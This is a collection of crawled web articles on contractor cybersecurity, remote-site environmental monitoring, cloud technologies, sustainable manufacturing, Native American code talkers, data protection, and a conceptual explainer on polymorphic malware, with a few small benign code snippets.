Following several cyber incidents targeting critical infrastructure that led to a shutdown of a key US energy pipeline, President Biden released an executive order in May 2021 to improve the nation’s cybersecurity. The order is an initial step toward securing systems used by the federal government, and in the near future, it will likely be required that all private companies that contract with the government follow the same protocol as the agencies.
Companies interested in winning government contracts must stay informed about the latest regulations and threats and implement the proper cyber safeguards to defend and ward against cyber attacks.
What Are The Current Cybersecurity Challenges Surrounding The Public Sector?
The public sector is driven by data since the information it provides is critical to the successful delivery of public services. Unfortunately, the volume and complexity of data have resulted in an uptick in malicious cyberattacks. Some of the most common cybersecurity challenges that currently surround the public sector include the following:
Phishing Attacks On Government Contractors Have Increased
Phishing is a common type of social engineering attack that is used to steal user data, such as credit card numbers and login credentials. This type of attack occurs when a cybercriminal masquerades as a trusted entity and tricks a victim into opening an email or message that contains a malicious link. Clicking the link can lead to the installation of malware. According to a Phishing Susceptibility Report published by PhishMe, about 91 percent of all cyberattacks begin with social engineering.
There Have Been Plenty Of Data Breaches Outside SolarWinds
While there has been a lot of discussion regarding the hacking of SolarWinds’ Orion product, this is not the only data breach that has affected government agencies and the private industry as a whole. According to Statista, the U.S. government accounted for 5.6 percent of all data breaches in the United States in 2019.
Defense Contractors Have Seen Increased Malware And Ransomware Attacks
Aside from phishing, malware and ransomware are some of the most prominent cybersecurity threats to government contractors.
Malware consists of malicious software, such as viruses, adware, spyware and worms that are often transmitted through email attachments, peer-to-peer downloads, misleading websites and phishing attempts. Ransomware is a type of malware used to block access to all or part of a computer system until the victim has paid a sum of money. Contractors have seen a steady increase in both malware and ransomware attacks in the last several years.
What Government Contractors Should Know About Cybersecurity In 2021
Cybersecurity threats continue to grow at a rapid rate and government contractors must keep pace to avoid a costly security breach or data loss. Businesses that want to avoid these risks must understand cybersecurity requirements in 2021 and how they apply to federal contractors. Here are some things that government contractors should know about cybersecurity:
The Internet of Things (IoT) Cybersecurity Improvement Act Was Signed into Law
The IoT Cybersecurity Improvement Act was officially signed into law at the end of 2020. The bipartisan legislation requires any IoT devices purchased with government funds to meet minimum security standards. The Act also addresses supply chain risks to the federal government caused by insecure IoT devices by implementing minimum security requirements.
FedRAMP Authorization Has Increased in Difficulty
The Federal Risk and Authorization Management Program (FedRAMP) is a government program that sets standards for authorizing, assessing and monitoring the security of cloud systems. Despite ongoing improvements to FedRAMP, the program has still shown some difficulties in terms of authorization.
The current authorization process is costly, slow and does not result in sufficient reuse of authorizations. The high costs, combined with long timelines, create a barrier to entry and make it difficult for providers to serve state and local government customers.
There Is Still Uncertainty Surrounding Preparation For CMMC
The Department of Defense (DoD) has recently developed a new certification framework to address certain risks posed by DoD contractors with inadequate cybersecurity controls. The Cybersecurity Maturity Model Certification (CMMC) is modeled after various frameworks but focuses on NIST Special Publication 800-171. However, there are concerns that there is not enough clarity regarding the certification process, the cost of becoming certified, and how CMMC reciprocity with other cybersecurity standards will work.
Cybersecurity Laws Are Continuously Evolving
Cybersecurity has been a major concern for both government and private sectors for more than a decade. To protect against new and ongoing threats, cybersecurity laws and regulations are created to help keep sensitive data out of the hands of cybercriminals.
As cybersecurity laws are continuously being enacted, government contractors must keep up-to-date with these changes to ensure compliance.
Speak With Hartman To Keep Up With Changes In Cybersecurity
Cybercriminals are growing increasingly sophisticated with their methods and the number of data breaches across the United States continues to rise. It is more important than ever for government contractors to strengthen their cybersecurity posture to win contracts and maintain compliance. For more information on how to address cybersecurity concerns and develop a strategy to prevent attacks, reach out to our experienced risk management consultants at Hartman Executive Advisors today. | <urn:uuid:9301bf58-a5c9-427d-ba8a-72764b4b9853> | CC-MAIN-2022-40 | https://hartmanadvisors.com/top-cybersecurity-concerns-for-government-contractors/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334528.24/warc/CC-MAIN-20220925101046-20220925131046-00565.warc.gz | en | 0.945196 | 1,086 | 2.796875 | 3 |
One of the most important ways to reduce your network vulnerability is by implementing a remote monitoring system that can report environmental conditions. This is especially critical if your remote sites are located in areas that can be brought down by factors such as high temperature, humidity, flooding, or fire.
Since we have been providing environmental monitoring solutions for more than 30 years, it is important for us to let you know that deploying an effective system does not have to be a hassle. If you follow simple best practices you can protect your network and your investment.
There's nothing like the peace of mind of knowing whenever your network equipment is in danger - before small, preventable problems become bigger issues.
When keeping an eye on the mission-critical equipment at your remote sites, it's critical to make sure that your monitoring system supports the following capabilities:
When putting together a remote system to monitor your environmental conditions, the first thing you need to do is choose an adequate sensor for each condition you want to monitor.
There are basically two different types of sensors that you could select from: analog and discrete.
Discrete sensors can only output information as an on or off indication. Think of the thermostat in your house: you set a specific temperature that separates an acceptable reading from an unacceptable one.
On the other hand, analog sensors are usually preferable for use in environmental monitoring systems. They provide a much higher level of detail than discrete sensors. Analog sensors will tell you, for example, exactly how cold or how hot it is at your sites (normally within 1 degree and within the specified minimum and maximum temperatures measurable by the sensor).
So, with an analog sensor, you will be able to monitor the environmental situation of your sites at all times by simply checking the current conditions.
Commonly measured via analog input are:
Battery, rectifier, and generator voltages
Wind speed and direction
Since you probably can't always be watching a sensor, make sure that your environmental system is also capable of sending you notifications when critical thresholds are crossed. You should, at least, be able to configure two thresholds. This will give you a good foundation for environmental monitoring, as you will be able to set up an alert for "major over" ("too hot", for example) and another for "major under" ("too cold", for example).
Better environmental systems, however, will provide support for additional thresholds, so you can set up both "major" and "minor" severities on both sides of your ideal range.
Depending on which environmental aspect you want to monitor, you should look for an environmental monitoring system with four-threshold analog inputs - this should include live monitoring of real-time levels.
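As a sketch of how four-threshold monitoring works, the classification logic might look like this in Python (the temperature values are hypothetical examples, not vendor defaults):

```python
def classify(reading, major_under, minor_under, minor_over, major_over):
    """Map an analog sensor reading onto a four-threshold alarm scale."""
    if reading <= major_under:
        return "major under"
    if reading <= minor_under:
        return "minor under"
    if reading >= major_over:
        return "major over"
    if reading >= minor_over:
        return "minor over"
    return "normal"

# Hypothetical temperature thresholds in degrees Fahrenheit
TEMP = dict(major_under=40, minor_under=55, minor_over=85, major_over=100)
```

A two-threshold system would use only the "major" pair; the "minor" pair gives you early warning before conditions become critical.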
Environmental monitoring, as the name suggests, means any monitoring of the physical environment around your network equipment and servers. It is different from direct equipment monitoring, which covers only equipment failures and problems not related to adverse environmental conditions around your equipment.
A large variety of unfavorable conditions can affect and take down your expensive infrastructure, and this is especially true at very remote locations such as a mountaintop. Since your remote sites are so distant, it's even more important to implement a competent environmental monitoring system. Your remote facilities are unmanned, which means you will need an automated system to monitor the critical environmental levels surrounding your mission-critical equipment.
Temperature is probably the most commonly monitored environmental level in both telecom and IT worlds. High temperatures are usually considered the biggest threat as all computer gear naturally generates large amounts of heat. If this heat is not reduced through venting or HVAC systems, then your equipment can be damaged or - at least - suffer a thermal shutdown that will lead to an interruption in service.
Temperature, however, is only one of many environmental factors that you need to monitor. Make sure that your environmental monitoring system monitors all your remote site environmental conditions. This includes humidity, flooding, power and even site security.
Humidity monitoring, for example, is critical in climates where relative humidity can rise to nearly 100% of air's capacity to hold moisture. When the humidity in a site exceeds acceptable levels for the equipment deployed there (normally anything over 90% will cause trouble for most of the devices), your ability to keep your network online reduces considerably.
Excess humidity can cause the internal components of your gear to rust and degrade, possibly leading to short-circuiting. Humidity levels that are too low make your equipment prone to static electricity, which can also damage it. That's why it is critical that you maintain humidity at moderate levels.
The quality of your environmental monitoring system will enhance the overall efficiency of your network. By choosing the right humidity meter, you will instantly protect your equipment. With so many different selections available in the market, it might be difficult to choose the right options for your business. Make sure your humidity monitor supports the following capabilities:
24x7 system access
Customized alarm notifications (by text, email, voice call, and etc)
Adequate sensor coverage
Advanced battery support for individual humidity sensors
Integrated monitoring technologies
Another example of an environmental condition is floor water. Floor water is similar to humidity but a lot more dangerous. If you have a leak that lets in rain water or seasonal flooding at your sites, a floor water sensor should give you important intelligence about which sites have puddles of water on their floors.
An efficient floor water sensor has about 4 metal contacts on its underside. These make contact with the floor. If a puddle of water connects any of these contacts (about 2 inches apart), the sensor will detect a small current flowing between the contacts (water is, of course, a good conductor of electricity).
Keep in mind that, unlike monitoring temperature or humidity, there really is no reason to use an analog floor water sensor. It all comes down to this: your floor either has water on it or it doesn't.
However, if you face extreme cases where semi-regular flooding is expected and equipment racks have been installed above a certain minimum height, then you could use a float sensor to determine flood water levels. In this specific scenario, monitoring rising water would give you the required alert that your equipment is about to go underwater.
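Putting the two ideas together, a monitoring system might combine the discrete floor sensor with an optional analog float reading like the sketch below (the rack height, units, and status strings are illustrative, not from any particular product):

```python
def flood_status(contacts_closed, water_level_in=None, rack_height_in=6.0):
    """Combine a discrete floor-water sensor (any contact pair bridged by
    water) with an optional analog float sensor reading, in inches."""
    if water_level_in is not None and water_level_in >= rack_height_in:
        return "critical: water approaching equipment"
    if contacts_closed:
        return "alarm: water on floor"
    return "dry"
```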
The primary damage caused by a power outage is, of course, the network downtime that happens when your site go dark. Network downtime leads to lost revenue and frustrated customers or end-users.
That is why you need to have complete visibility of your remote site power supplies.
Make sure your remote system is able to monitor everything - commercial power availability, battery voltage levels, rectifiers, generators, and generator fuel levels. Also, your environmental monitoring system should tell you when the power has dropped below or surged above a set threshold. It should notify you or the correct techs when a problem has occurred.
Your expensive, mission-critical equipment is kept in nondescript equipment huts or at unmanned remote sites. Your facilities or remote sites face the risk of vandalism and theft every day, simply because of their distant location, little to no human presence, and minimal security deterrents.
So, monitoring unauthorized entry to your remote facilities protects your network and protect your investments. Security monitoring normally includes door sensors, motion sensors and IP cameras.
To make sure you are getting the most bang for your buck when purchasing a facility access remote monitoring system, be sure it:
It's hard enough to maintain a single monitoring system. Do you have two? Do you have more than two?
There are many different reasons why you may have two or more incompatible systems. Older equipment normally accumulates in layers, with different systems being used to monitor different parts of the network. Or, if your company has acquired another network, you may now be responsible for two different, incompatible networks.
However, you can't view your environmental conditions separately from your entire network. Therefore, look for an environmental monitoring system that can monitor your mission-critical gear, such as switches, routers, and microwave radios.
Integration is the best way for working with diverse network monitoring systems. Some of the benefits you can achieve by integrating your isolated remote monitoring systems are:
Your integrated system should be able to send you notifications by email and text messages, but it also should feature web browser access - for all your alarms from all your equipment.
You might think that integration is a hard task to accomplish, that it is too complicated to be done effectively, but you need to know that thanks to advances in software and protocol conversion make it easier than ever to integrate incompatible systems.
So, before you commit to buying monitoring equipment, make sure it will support your integration strategy.
Environmental conditions monitoring can be easily overlooked during the design of network alarm monitoring systems.
To have proper visibility over your mission-critical equipment deployed at remote sites, you need accurate information about every element involved with your gear. This means keeping an eye not only on your base equipment, but also on all the equipment that supports it and, of course, the environmental conditions that all your equipment requires to function properly.
We have many clients starting with their very first monitoring project and they don't quite know yet all that they could and should monitor. So, to help them make informed decisions and have better network efficiency, we've put together the Fundamentals of a Network Alarm Monitoring System white paper.
This white paper will serve as a guide to give you information about how to implement an alarm monitoring system in your network. You'll learn what equipment you must monitor, how to design an alarm system that will meet your current and future requirements, and how to minimize transition costs.
Download your free PDF copy of the Fundamentals of a Network Alarm Monitoring System and protect your network with a perfect-fit solution.
The advance of emerging technologies enabled by cloud computing has been dizzying over the last several years.
In some cases, these new technologies have been created by cloud companies specifically for the cloud; for instance, serverless. In other cases, a technology has advanced by its close relationship with the cloud; for instance, machine learning and artificial intelligence.
In either case, these emerging technologies are changing not just cloud, but the larger world of enterprise computing – not to mention sectors ranging from retail to media to pharmaceutical.
Top Emerging Technologies in Cloud Computing
These emerging technologies – either cloud-based or highly interoperable with the cloud – offer enormous promise, yet they have also contributed to a growing complexity in cloud computing.
In the spring of 2014, container technology burst upon the scene; the tech world was abuzz with how containers make software development faster and more nimble.
Containers weren’t actually new, but a little known outfit named Docker made them easy to use.
Unlike the virtual machine popularized by VMware, which has to hold the entire OS, containers wrap a piece of software in a capsule that’s like a lightweight “computing suitcase.” The container carries the software itself and only the bare essentials needed (libraries and configuration files) to travel among computing environments.
Adoption has been fast for such a new technology. The Rightscale State of the Cloud 2019 report indicates that 66 percent of enterprises have adopted containers. Similarly, 60 percent have adopted Kubernetes, the container management system developed by Google.
Given the myriad elements of a cloud environment, it’s no surprise that it’s producing a wide variety of emerging technologies.
Prior to AWS’s introduction of serverless architecture in 2014, cloud customers estimated – guessed – what level of computing resources they’d need to provision, and paid accordingly. With serverless, customers are charged only for what they actually use.
More significant, with serverless, the cloud provider handles the infrastructure headaches of maintenance and scaling, making it easier and faster for customers (particularly developers) to build out their cloud-based systems.
Serverless, also known as function as a service, allows the cloud world to spin much faster and more efficiently.
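As an illustration, a serverless function is just a handler the provider invokes on demand. This minimal AWS-Lambda-style sketch assumes a simple HTTP-style trigger; the exact event shape depends on the trigger you configure:

```python
import json

def handler(event, context):
    """A minimal Lambda-style handler; the provider invokes it on demand
    and bills only for the time it actually runs."""
    name = event.get("name", "world")
    return {
        "statusCode": 200,
        "body": json.dumps({"message": f"Hello, {name}!"}),
    }
```

There is no server to provision or patch here; scaling to zero (and back up) is the provider's problem, which is the core of the serverless value proposition.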
Updating large, complex pieces of software can be a slow and cumbersome process. Enter microservices, which started gaining buzz around 2012.
Microservices breaks these unwieldy monolithic apps into a number of smaller, joined services, or “modules.” It uses a modular approach, with small teams updating modules as needed, independent of the full hulking application. (Anecdotally, industry lore says that the module should be small enough so a team that can be fed by two pizzas can update it.)
Microservices enables continuous delivery of freshly updated software. Like serverless, it allows app development to move at the faster speed necessitated by the cloud era.
Speaking of continuous delivery, DevOps is focused on exactly that: CI/CD (continuous integration / continuous delivery). DevOps, which started gaining serious momentum around 2012, is as much a cultural shift as a technology. Its aim is to speed software development by getting two groups with very different worldviews to speak to one another: developers and operations managers.
Developers are often artists at heart; they create things. Operations managers are typically the opposite; they embrace metrics and spreadsheets. But if the dev team and the ops team can work together (hence, “DevOps”) the all-important software updates can flow out fast enough to gain competitive advantage.
Internet of Things (IoT)
In the cloud era, everything – everything – can be connected to the Internet. From your wristwatch (Fitbit, Apple Watch) to your home controls (Nest) to self-driving cars to surveillance cameras. This vast network of sensors – the Internet of Things – generates ginormous oceans of data.
IoT exists separately from cloud computing, but two factors inextricably link the two technologies.
First, as is true with many new technologies, with IoT businesses wondered: How are we going to buy it? We can’t build it all from scratch – it’s too expensive and complicated. And as is often the case, with IoT the answer is: through the cloud. Each major cloud platform offers an IoT solution.
Moreover, the key question about IoT, also known as “edge computing,” is: where will we process all that data? For many businesses, the answer is “in our cloud platform.” Cloud-based data analytics, powered by the cloud providers’ hyperscaling servers, offer superior data crunching.
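One common pattern is to pre-aggregate at the edge so that only compact summaries travel to the cloud rather than every raw sample. A minimal sketch (the field names are illustrative, not any platform's schema):

```python
import json
import statistics

def summarize(readings):
    """Edge-style pre-aggregation: ship a compact summary to the cloud
    instead of every raw sensor sample."""
    return json.dumps({
        "count": len(readings),
        "mean": round(statistics.mean(readings), 2),
        "min": min(readings),
        "max": max(readings),
    })
```

The heavier analytics – trend detection, anomaly scoring – then run on the cloud provider's hyperscale infrastructure against these summaries.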
Artificial intelligence is the big one, the emerging technology that will ultimately do the most to profoundly shape the future. With its promise of software that learns independent of human assistance, AI is the great tool whose august potential dwarfs all other tools.
And again, while AI certainly exists separately from cloud, AI is far too complex for businesses to build themselves. So businesses look to cloud companies for their AI solutions, including machine learning and deep learning tools.
In the early days of cloud, its ability to offer basic compute and storage was the great democratizer. Cloud providers enabled small-fry companies to “rent a datacenter” and so compete with the big whales. As cloud matures, it is cloud-based AI that is enabling the next generation of underfunded visionaries to realize their vision – just like deep-pocketed outfits.
“Significant change is afoot [in manufacturing] and it necessitates bigger thinking. Those unprepared may find themselves being left behind.”- 2021 Deloitte report, Sustainable Manufacturing: From Vision to Action
Sustainability is gaining hold in the manufacturing industry. Customers are looking for products and partners who follow eco-friendly practices, adopt green policies, and share a commitment to sustainability.
Another critical reason for manufacturers to undertake sustainability initiatives and include them as a key goal in their strategy and operations is the substantial financial benefit and worldwide competitiveness they bring.
Related Reading: 6 Technologies Driving Sustainability in 2022
However, implementing sustainable production comes with issues and challenges that can be overcome by adopting modern technologies. Product development merged with digital technologies helps to reap the true potential of sustainable manufacturing and achieve environmental conservation goals.
What is Sustainable Manufacturing?
Sustainable manufacturing is a process of creating products with minimal negative environmental impact. It is a strategic method to “meet the needs of the present, without compromising the capability of the future generation to meet theirs.”1 The prime objective of sustainable manufacturing is to conserve energy and natural resources while minimizing waste.
The manufacturing industry contributes significantly to greenhouse gas emissions and uses water and energy excessively. Hence, it is also among the most scrutinized industries when it comes to sustainability.
Smart, efficient, and low-impact manufacturing practices also give manufacturers a leg up during the supplier evaluation process, as sustainability distinguishes them from the rest and positions them to stay ahead of the competition.
Virtually all of the world’s largest companies now issue a sustainability report and set goals; more than 2,000 companies have set a science-based carbon target, and about one-third of Europe’s largest public companies have pledged to reach net zero by 2050.2
Technology Supporting Sustainability in Manufacturing & Distribution
So what’s making sustainability so easy to adopt? The straightforward answer: modern technologies. Here we have put together a list of modern technologies that are making manufacturing processes sustainable.
- Additive Manufacturing
Subtractive manufacturing, also called traditional manufacturing, includes drilling, cutting, and grinding processes. These processes generate a large amount of waste in the form of chips and scraps, affecting economic and environmental sustainability. Additive manufacturing, by contrast, represents a more sustainable means of production.
Additive manufacturing eliminates the use of excess materials and unnecessary waste from the outset through 3D printing. It not only saves time but also provides end-of-product-life-cycle solutions, enabling more environmentally benign practices. Additive manufacturing also allows for resource-efficient material use via recycling.
According to Eduard Hryha, researcher and project manager for the new Centre for Additive Manufacture – Metal (CAM2) at Chalmers University of Technology in Sweden, additive manufacturing might play a significant role in the long term in reaching the United Nations’ Sustainable Development Goals (SDGs).3
To quote him, “To reach the climate goals, we must make significant changes to the way we manufacture products and additive manufacturing is one of those revolutionary methods.”
- Big Data and Digital Twins
Big data has already become a powerful tool for monitoring and controlling sustainable development in the manufacturing industry. It helps to understand trends, preferences, and correlations on the larger data sets for effective decision-making.
This is especially true in smart factories, where data captured from sensors during production activities can be analyzed for predictive maintenance operations. Other benefits that big data offers are process optimization, real-time monitoring, production efficiency, and management automation.
According to the ‘Digital Twins: Adding Intelligence to the Real World’ report from the Capgemini Research Institute, 60% of organizations across major sectors are leaning on digital twins to fulfill their sustainability agenda.4
Digital twins help to improve product design and manufacturing by serving as a real-time digital counterpart of physical entities in a system. It enables product designers to embed and follow circular economy principles throughout each stage of design.
- Artificial Intelligence and Machine Learning
AI and machine learning generate a lot of opportunities for sustainable manufacturing. They create an efficient and transparent supply chain, which significantly decreases operational friction. They can also evaluate component images on ongoing production lines and instantly identify even the slightest deviation from the standards in real time.
According to Deloitte’s survey on AI adoption in manufacturing, 93 percent of companies believe AI will be a pivotal technology to drive growth and innovation in the sector.5 AI continually learns and suggests optimal operation parameters for production runs, indicating how much you could save in energy and carbon consumption. It will also recommend adjustments to help you achieve the highest efficiency level.
AI-enabled computer vision systems and smart cameras can also help improve the safety of workers. It can inspect if the workers are wearing safety equipment and complying with safety rules improving the social sustainability of the manufacturing business.
- Internet of Things (IoT)
The Internet of Things (IoT) plays an important role as a key enabler of sustainable manufacturing. Deployment of a large number of sensors and advanced controls makes manufacturing cost-effective and helps to achieve extensive environmental goals.
Related Reading: How is Industrial IoT Making Manufacturing Safe?
Manufacturers can collect a more significant amount of data and convert it into valuable business information to improve product quality and increase production efficiency and resource utilization.
One of the findings revealed that 94% of key decision-makers across 12 industrial segments agree that Industrial IoT can improve overall sustainability. Moreover, 72% are looking to increase spending on this technology due to its impact on sustainability.6
IoT-based solutions also help manufacturers optimize their entire energy system. Through real-time data collection and data processing, manufacturers will be able to quickly identify irregularities and patterns and take suitable measures right away.
- Cloud Computing and Manufacturing
As manufacturing becomes more integrated and complex, cloud computing will be considered a key enabler of sustainable manufacturing. It offers advantages like the computational power required to apply ML, AI approaches, and other smart technologies in Industry 4.0.
Free Download: Cloud and Infrastructure infographic
Manufacturers can make more intelligent decisions to adopt the most sustainable and robust manufacturing route using cloud technologies. Cloud computing also helps power core capabilities like automation to reduce production time, avoid over- or underproduction, and take measures to reduce energy consumption.
- Augmented and Virtual Reality
Manufacturers looking to embrace sustainability should invest in Augmented Reality (AR) technology. It has made the training process a lot easier and faster, improved operators’ performance, and enhanced throughput.
AR can also provide instructions to maintain and change machine setup for assembly processes, decreasing the amount of time it takes to understand instructions and improving workflow and productivity.
Using real-time visuals, manufacturers can make products come to life. Visualized workflows make processes much clearer to troubleshoot problems, fix them and prevent them from happening in the future.
- Blockchain Technology
In the traditional manufacturing supply chain, the information is usually managed and stored in a centralized location which increases the risk of losing data. The whole system could become vulnerable to errors or attacks, reducing trust between supply chain parties. This approach also affects reliability and transparency in the supply chain processes.
Blockchain overcomes these barriers by building a reliable, transparent, traceable, and secure supply chain.7 This improves trust between stakeholders, reduces transaction costs, optimizes manufacturing processes, and minimizes production time. Blockchain in the manufacturing market is expected to reach $778.05 million by 2026.
- Robotic Process Automation
RPA and sustainability are aligned in the manufacturing sector. RPA is the perfect technology companion to accelerate sustainability, eliminate waste, and bolster a company’s bottom line. Though robots have been helping manufacturers streamline assembly lines, companies still struggle to effectively manage operational and back-end processes.
Free Download: Robotic Process Automation Infographic
RPA analyzes existing manufacturing processes for opportunities to improve efficiency and accuracy. It offers companies improved agility in operations across the entire value chain. It helps them to operate time-intensive processes like procurement, inventory management, and payment processing while strategizing cost reduction, innovating business operations, and keeping up with regulations.
Companies implementing RPA for manufacturing activities experience an increase in accuracy, flexibility, and productivity decreasing energy consumption, waste, and workplace injury. Surveys show that 43% of manufacturers already use robotic process automation, while a further 43% plan to deploy RPA initiatives.8
Transform to Low Carbon Future with iLink Digital
Together with our partners, we help our clients reinvent their businesses at scale, creating value and sustainable impact. Our sustainability framework helps speed up each stage of the net zero journeys including design-related transformation, and business model adaptation.
From strategy to execution our portfolio of services is designed to help you tackle your greatest sustainability challenges and realize the competitive advantage and impact at scale that sustainability brings. We embed sustainability into everything we do!
Check out our service portfolio to discuss how a sustainable manufacturing solution can help your business. | <urn:uuid:9be00158-766c-4be1-8dc0-1177c8741d9d> | CC-MAIN-2022-40 | https://www.ilink-digital.com/services/cloud-consulting-services/cloud_blog/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00565.warc.gz | en | 0.916831 | 2,040 | 3.359375 | 3 |
Native American Code Talkers
The term Native American Code Talkers refers to the many people from indigenous communities within the US who served with the US military, encoding and decoding communications in their native languages.
Code talkers used their knowledge of their largely unknown native languages as the foundation for encrypting verbal messages, strengthening encryption and making it agile on the battlefield. They used a simple substitution cipher that replaced each letter of the English alphabet with a native word, and they used direct translation from English to the native language and back. For the latter, descriptive words were substituted where no native terms applied: in World War II the word Britain became “between two waters”, fighter aircraft became “hummingbird”, and battleships were called “whales”.
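The two-layer scheme described above — whole-word codes where they exist, letter-by-letter substitution otherwise — can be sketched in a few lines of Python. This is a toy illustration only: the mappings below are tiny illustrative samples, not the actual wartime code, and the real system was far richer.

```python
# Toy sketch of the two code-talker techniques described above.
# The mappings are small illustrative samples, not the real wartime code.

letter_code = {"a": "wol-la-chee", "b": "shush", "c": "moasi"}   # letter -> native word
word_code = {"britain": "between two waters", "battleship": "whale"}  # whole-word codes

def encode(message):
    out = []
    for word in message.lower().split():
        if word in word_code:          # prefer a whole-word code if one exists
            out.append(word_code[word])
        else:                          # otherwise spell the word letter by letter
            out.append(" ".join(letter_code.get(ch, ch) for ch in word))
    return " / ".join(out)

print(encode("abc battleship"))
# wol-la-chee shush moasi / whale
```

Decoding simply inverts both dictionaries — which is exactly why the scheme was strong: inverting it requires fluency in a language very few outsiders knew.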
An estimated 400-500 Native Americans worked with the United States Marine Corps with encoding and decoding messages as their primary responsibility. The dominant language for USMC code talkers during WWII was Navajo, whose speakers were deployed alongside conventional communications personnel in the Pacific theatre. In WWII — across the Pacific, North African, and European theatres — the US Army also deployed Native American code talkers, and speakers of other lesser-known languages (e.g., Basque speakers from San Francisco, CA, serving in the USMC) answered the call to serve in this way. For their part, members of the Cherokee and Choctaw tribes pioneered code talking during World War I, at or around the time of the Meuse-Argonne Offensive on the Western Front in 1918.
“Native American Code Talkers were heroes who lent their talents toward the cause of US and world freedom by serving with the US military. They used lesser-known languages such as Navajo which baffled the enemies’ efforts to eavesdrop on frontline and other communications.” | <urn:uuid:9f1cb6d6-38f3-48f0-af44-df66ebf9604e> | CC-MAIN-2022-40 | https://www.hypr.com/security-encyclopedia/native-american-code-talkers | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00565.warc.gz | en | 0.9679 | 369 | 4.40625 | 4 |
These data can easily be exploited to harm you, and that’s especially dangerous for vulnerable individuals and communities, such as journalists, activists, human rights defenders, and members of oppressed and marginalized groups. That is why these data must be strictly protected.
Why is the regulation on data protection important?
The GDPR has revolutionized the way data protection and privacy are viewed. The Regulation mirrors the GDPR in that it makes businesses or organizations liable if they or their third-party contractors handle citizens’ or residents’ personal data without complying with privacy laws.
What is General data protection Regulation and why is it important?
The purpose of the GDPR is to impose a uniform data security law on all EU members, so that each member state no longer needs to write its own data protection laws and laws are consistent across the entire EU.
Why is a regulation data protection important and why is it important to keep personal information private?
The Importance of Data Privacy
Keeping private data and sensitive information safe is paramount. … The lack of access control regarding personal information can put individuals at risk for fraud and identity theft. Additionally, a data breach at the government level may risk the security of entire countries.
Why is data protection important in research?
Research data planning is an important part of ensuring your research is conducted in a way that is compliant with data protection, freedom of information and record management requirements. The Research Data Service (part of Information Services) offer advice and tools to help you manage research data.
What function do regulations like the general data protection regulation?
What function do regulations like the General Data Protection Regulation (GDPR) serve? to ensure companies are safeguarding customer data according to a set of minimum standards. to allow government agencies access to companies’ customer data in the case of criminal proceedings.
What function do regulations like the General Data Protection Regulation serve?
Answer: This regulation is called the EU General Data Protection Regulation or GDPR, and is aimed at guiding and regulating the way companies across the world will handle their customers’ personal information and creating strengthened and unified data protection for all individuals within the EU.
Do I need to comply with GDPR?
Any company that stores or processes personal information about EU citizens within EU states must comply with the GDPR, even if they do not have a business presence within the EU. Specific criteria for companies required to comply are: A presence in an EU country.
Why is it important to keep personal data confidential?
Data privacy has always been important. … A single company may possess the personal information of millions of customers—data that it needs to keep private so that customers’ identities stay as safe and protected as possible, and the company’s reputation remains untarnished.
Its main purpose is to protect and promote the interests of patients and the public, while also making sure that confidential patient information can be used when it is appropriate, for purposes beyond individual care.
Why is data protection an ethical issue?
Data protection is an ethical issue. It involves respect for individuals and their rights regarding privacy and the use of information about them. … Data protection issues are raised formally during the ethics process.
How do you maintain data protection in research?
Keep data secure
Use a computing services server to store data wherever possible. Don’t put the data onto a mobile device unless it is secure – password protected and, where appropriate, encrypted. Restrict access to data and maintain confidentiality by: only allowing other staff to access the data if necessary.
What does data protection mean in research?
The Data Protection legislation covers how personal data should be processed. … Researchers have to consider how they manage personal data from the point they start collecting it, through storage to disposal. | <urn:uuid:e4e8e734-33bf-40d1-8f4c-1490d3fbe6a6> | CC-MAIN-2022-40 | https://bestmalwareremovaltools.com/physical/why-do-we-need-data-protection-regulation.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00565.warc.gz | en | 0.916946 | 765 | 2.90625 | 3 |
Creator: University of Houston
Category: Software > Computer Software > Educational Software
Topic: Language Learning, Learning English
Tag: culture, theoretical, world
Availability: In stock
Price: USD 49.00
This is a six-week course providing a historical overview of the American Deaf community and its evolving culture. Theoretical frameworks from sociology are explored.
Deafness as a culture and not a disability is explained as participants are guided into the world of Deaf culture. | <urn:uuid:827476b1-ee9e-4cb2-aacc-4e8e24c1087f> | CC-MAIN-2022-40 | https://datafloq.com/course/american-deaf-culture/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337415.12/warc/CC-MAIN-20221003101805-20221003131805-00565.warc.gz | en | 0.904058 | 101 | 2.515625 | 3 |
Metamorphic and Polymorphic malware
Can you imagine a piece of malware whose code changes its shape and signature each time it appears, making it extremely hard for signature-based antivirus to detect? This is exactly what polymorphic and metamorphic malware do.
In its annual threat report, security firm Sophos said that the majority of samples it observes are unique attacks associated with polymorphic and metamorphic malware.
Although the idea of mutating malware sounds quite scary, it has actually been used by malicious hackers since the early 1990s — and the techniques are getting very advanced. Antivirus solutions usually use signatures to identify malware, comparing each file with their database of malware signatures. If the file under investigation has a signature that matches one of the signatures in the database, the infection is detected.
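Signature matching of this kind can be sketched in a few lines of Python — here using SHA-256 hashes as the “signatures” and invented sample bytes. Real engines use far more elaborate signatures than a whole-file hash, but the lookup idea is the same.

```python
import hashlib

# Minimal sketch of signature-based detection: hash the file and look the
# hash up in a database of known-malware signatures. Sample data is invented.

known_signatures = {hashlib.sha256(b"EVIL-SAMPLE-v1").hexdigest()}

def is_known_malware(file_bytes: bytes) -> bool:
    return hashlib.sha256(file_bytes).hexdigest() in known_signatures

print(is_known_malware(b"EVIL-SAMPLE-v1"))   # True  -> exact match, detected
print(is_known_malware(b"EVIL-SAMPLE-v2"))   # False -> one byte changed, missed
```

The second call shows the weakness this article is about: change a single byte and a pure signature lookup no longer matches.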
Crackers are getting smarter. When you visit a suspicious website, you get infected with malware that has a certain shape and signature. When another person visits the same site, they get infected with the same malware but with a different shape and signature. Each time someone downloads the malware, a new shape is generated automatically — even refreshing the page generates a new shape for the same malware! This makes it very difficult for signature-based antivirus solutions to cope.
Not only does each download of the same malware have a different shape; the same malware on a given machine will keep changing its shape to avoid detection. This is how sophisticated polymorphic and metamorphic malware can be.
It is important to note that although the malware changes (“morphs”) its shape with each iteration and each download, the function it performs remains the same (it changes its appearance, but the bad code inside still does the same damage).
Shylock is one documented example: malware that once appeared with one file name and description and, over time, appeared as a completely different file, changing its signature along the way.
Metamorphic malware
